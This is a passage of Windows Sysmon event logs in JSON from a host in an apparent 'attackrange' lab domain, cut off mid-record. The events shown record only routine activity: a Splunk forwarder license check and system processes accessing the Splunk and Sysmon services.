{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3311,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.463\r\nProcessGuid: {A837DB8D-023A-5F25-0000-0010C9330500}\r\nProcessId: 4488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-001019300500}\r\nParentProcessId: 4368\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.463","ProcessGuid":"{A837DB8D-023A-5F25-0000-0010C9330500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-001019300500}","ParentProcessId":"4368","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3312,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nSourceProcessId: 4368\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-0010C9330500}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","SourceProcessId":"4368","SourceThreadId":"3288","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-0010C9330500}","TargetProcessId":"4488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3313,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-0010C9330500}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-0010C9330500}","TargetProcessId":"4488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3314,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3315,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3316,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3317,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3318,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3319,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 